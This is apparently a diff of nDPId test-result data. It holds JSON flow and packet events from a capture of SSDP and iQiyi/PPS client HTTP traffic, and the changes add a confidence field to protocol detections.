 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1467353187172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353187172,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAgsAAAERAYPAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}}
 01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"ts_msec":1467353189328,"pkt":"ABxCjnAxTF4M6gNlCABFAAIolNRAADgGLx3fGmoTwKhzCABQxUlJtLVYfXHrilAYAB9+agAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTcwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjM1OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQphcHA9ZWd1aSxla3JuLG5vZDMya3VpLG5vZDMya3JuDQpjb3VudD0xDQpjMD1Eb3dubG9hZEhlbHBlcg0KW0Rvd25sb2FkZXJdDQpEb3dubG9hZEhlbHBlcj1odHRwOi8vc3RhdGljLnFpeWkuY29tL2V4dC9jb21tb24vcWlzdTIvRG93bmxvYWRIZWxwZXIuZGxsO1N0YXJ0O1FJWUk="}
 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353189363,"pkt":"TF4M6gNlABxCjnAxCABFAAOkLbJAAIAGvJjAqHMIymwO7MVIAFBYgFOZMQ8QiVAYQTddVQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODcwNTMmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
-01263{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01289{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01009{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1467353189784,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":473,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":473,"pkt_l4_len":439,"ts_msec":1467353189784,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHLI6UAAAER3rTAqAUm7\/\/\/+gdsB2wBt3SETk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xOTIuMTY4LjUuMzg6Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjJmNjg4ZWNlLWMwYjEtNDEwNC1iOWU1LWNiY2VlNTAzZTZiNA0KVVNOOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0Ojp1cG5wOnJvb3RkZXZpY2UNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1467353189820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353189820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDksAAAER9TXAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1467353189831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"ts_msec":1467353189831,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHUI6YAAAER3qrAqAUm7\/\/\/+gdsB2wBwIVJTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="}
 01077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1467353189909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":525,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":525,"pkt_l4_len":491,"ts_msec":1467353189909,"pkt":"AQBef\/\/6cBiLE+IdCABFAAH\/I6cAAAER3n7AqAUm7\/\/\/+gdsB2wB6x3GTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQ6OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpDYWNoZS1Db250cm9sOm1heC1hZ2U9OTAwDQpTZXJ2ZXI6TWljcm9zb2Z0LVdpbmRvd3MvNi4yIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6MDAyODViYzNjM2JhMjA3MDA3ZTFjM2I3NjIxYzg0NzYNCg0K"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="}
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}}
+00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}}
 01795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFMUINClFZQWdlbnQ9aHR0cDovL21iZGFwcC